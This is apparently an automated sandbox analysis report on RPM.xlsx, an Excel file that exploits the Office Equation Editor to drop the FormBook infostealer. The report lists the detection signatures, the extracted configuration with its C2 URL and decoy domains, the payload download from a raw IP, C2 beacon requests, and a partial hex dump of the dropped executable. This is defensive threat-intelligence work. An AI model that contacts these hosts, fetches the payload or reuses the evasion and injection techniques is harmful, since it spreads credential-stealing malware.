Windows Analysis Report RPM.xlsx

Overview

General Information

Sample Name: RPM.xlsx
Analysis ID: 491441
MD5: eaa0090a7f7c6f995a4ff9b84410ef81
SHA1: 82198ab187a84b7a90ae83d57bfddd3c3acaafbc
SHA256: a81768982216ba95346c4a6eb0a591e71ab952b187565aef82331e8bb60851ea
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.vetpipes.com/scb0/"], "decoy": ["introlly.com", "slowtravelco.com", "sasanos.com", "3424soldbastrophwy.com", "isabelaefernando.net", "0754fm.com", "meta-bot.xyz", "778tt8.com", "krallechols.quest", "lipagent.com", "dermaqueeniran.com", "psychoterapeuta-wroclaw.com", "marmorariapiramide.online", "luxonealbery.com", "floridawp.com", "nebobuild.com", "facillitiespro-sweep.com", "wwgzj.com", "puffsmoke.online", "cryptofuelcars.com", "mcintoshsonoystercompany.com", "viscoent.online", "daveparkernotary.com", "publicschools.fail", "traexcel.com", "lovelypersonals.com", "emptycc.net", "omniriot.com", "etsawi9.com", "rangerbuddys.com", "medchemic.com", "paparazziprom.com", "atelifer.com", "imlgw.com", "vaguva.com", "theportlandhandyman.com", "oggu2.com", "fuchs-consolidated.net", "onluo.com", "flirtylocals.xyz", "foxyladynails.com", "dgyej.com", "cloudmaigc.com", "lafabriqueabeille.com", "vivagru.com", "fuckingmom88.xyz", "caesarscssino.com", "jyh8882.com", "diyiyc.com", "lanceseuexpert.digital", "omshivematka.com", "agrigain-soil.com", "burgettflorist.com", "goddarddrillingllc.com", "nchh07.xyz", "tabulose-paare.com", "notlficationintuit.com", "killercross.com", "storybylightstudio.com", "flex-ecommerce.com", "fearlessthread.com", "skateboardlovers.com", "mgav34.xyz", "lucanos.info"]}
Multi AV Scanner detection for submitted file
Source: RPM.xlsx Virustotal: Detection: 32% Perma Link
Source: RPM.xlsx ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514238693.0000000000030000.00000040.00020000.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.atelifer.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 7_2_00406ABF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop ebx 9_2_00086ABF
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 23.95.13.176:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 23.95.13.176:80

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 204.141.43.204 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.floridawp.com
Source: C:\Windows\explorer.exe Domain query: www.atelifer.com
Source: C:\Windows\explorer.exe Network Connect: 203.170.129.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.187.86.150 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.viscoent.online
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.meta-bot.xyz
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.meta-bot.xyz
Source: C:\Windows\explorer.exe DNS query: www.meta-bot.xyz
Source: C:\Windows\explorer.exe DNS query: www.meta-bot.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.vetpipes.com/scb0/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /scb0/?Fd=mwRuPibKyw2L8cALxBov5M1LiNVIxoe3TesDkz/iiiM8SziCnVEVET/qb0i1hxI+nmTWCA==&w6AxuD=NpI8gJ HTTP/1.1Host: www.atelifer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /scb0/?Fd=9/BqtxNO8SZEigUgjw/jJ2i6+zR3ejBZmh2LifaRE3cbasx521HSBMlSKzI9uLCsk85EYQ==&w6AxuD=NpI8gJ HTTP/1.1Host: www.floridawp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /scb0/?Fd=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&w6AxuD=NpI8gJ HTTP/1.1Host: www.viscoent.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /scb0/?Fd=BfSM6E5FO5mfZBpeeQrV1vQh+D95EOiFfI1FDjk8ynIPzfiNz31eNoHs9fDCzXb1/NDphw==&w6AxuD=NpI8gJ HTTP/1.1Host: www.meta-bot.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 209.17.116.163 209.17.116.163
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 13:40:02 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Mon, 27 Sep 2021 09:27:39 GMTETag: "99000-5ccf6b55049f0"Accept-Ranges: bytesContent-Length: 626688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8b 8e 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 84 09 00 00 0a 00 00 00 00 00 00 82 a2 09 00 00 20 00 00 00 c0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 a2 09 00 4f 00 00 00 00 c0 09 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 82 09 00 00 20 00 00 00 84 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 06 00 00 00 c0 09 00 00 08 00 00 00 86 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 09 00 00 02 00 00 00 8e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 a2 09 00 00 00 00 00 48 00 00 00 02 00 05 00 14 94 01 00 b4 9d 02 00 03 00 00 00 f9 02 00 06 c8 31 04 00 68 70 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 72 01 00 00 70 2a 1a 72 1b 00 00 70 2a 1e 19 8d 10 00 00 01 2a 1e 02 28 16 00 00 0a 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 86 02 03 28 0c 00 00 06 02 04 28 0e 00 00 06 04 2c 0f 04 8e 2c 0b 03 7e 17 00 00 0a 6f 33 03 00 06 2a 8a 02 03 28 0c 00 00 06 02 04 28 10 00 00 06 04 28 18 00 00 0a 2d 0b 03 7e 17 00 00 0a 6f 33 03 00 06 2a ce 02 28 0b 00 00 06 25 6f 32 03 00 06 03 28 19 00 00 0a 6f 33 03 00 06 02 28 0b 00 00 06 25 6f 32 03 00 06 72 31 00 00 70 28 19 00 00 0a 6f 33 03 00 06 2a 72 02 28 16 00 00 0a 02 03 28 17 00 00 06 02 04 28 19 00 00 06 02 05 28 1b 00 00 06 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /rpm/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.13.176Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: unknown TCP traffic detected without corresponding DNS query: 23.95.13.176
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 Sep 2021 13:41:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: vbc.exe String found in binary or memory: http://kr.battle.net/heroes/ko/
Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: http://kr.battle.net/heroes/ko/?https://twitter.com/Dalsae_info9https://twitter.com/hanalen_
Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.497302771.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.561983563.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.497302771.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.680918872.0000000004310000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.476340070.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.480792960.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.562841566.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.492443400.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/account/verify_credentials.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/blocks/create.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/blocks/ids.json
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/direct_messages.json
Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/direct_messages.jsonyhttps://api.twitter.com/1.1/friendships/no_retweets
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/favorites/create.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/favorites/destroy.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/favorites/list.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/friends/ids.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/friends/list.json
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/friendships/no_retweets/ids.json
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/friendships/update.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/destroy/
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/statuses/home_timeline.json
Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/home_timeline.jsonahttps://upload.twitter.com/1.1/media/upload.
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/statuses/mentions_timeline.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/retweet/
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/show.json
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/statuses/unretweet/
Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/unretweet/whttps://api.twitter.com/1.1/statuses/mentions_timeli
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: vbc.exe String found in binary or memory: https://api.twitter.com/1.1/statuses/user_timeline.json
Source: vbc.exe, 00000006.00000002.470191494.00000000002A2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/user_timeline.jsonwhttps://api.twitter.com/1.1/account/verify_c
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/1.1/users/lookup.json
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/oauth/access_token
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/oauth/authorize?oauth_token=
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://api.twitter.com/oauth/request_token
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://pbs.twimg.com/media/
Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: vbc.exe, vbc.exe, 00000007.00000000.469131784.00000000002A2000.00000020.00020000.sdmp, svchost.exe, 00000009.00000002.680591656.0000000001037000.00000004.00020000.sdmp String found in binary or memory: https://twitter.com/
Source: vbc.exe String found in binary or memory: https://twitter.com/Dalsae_info
Source: vbc.exe String found in binary or memory: https://twitter.com/hanalen_
Source: vbc.exe String found in binary or memory: https://upload.twitter.com/1.1/media/upload.json
Source: vbc.exe String found in binary or memory: https://userstream.twitter.com/1.1/user.json
Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0181866.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.atelifer.com
Source: global traffic HTTP traffic detected: GET /rpm/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.13.176Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /scb0/?Fd=mwRuPibKyw2L8cALxBov5M1LiNVIxoe3TesDkz/iiiM8SziCnVEVET/qb0i1hxI+nmTWCA==&w6AxuD=NpI8gJ HTTP/1.1Host: www.atelifer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
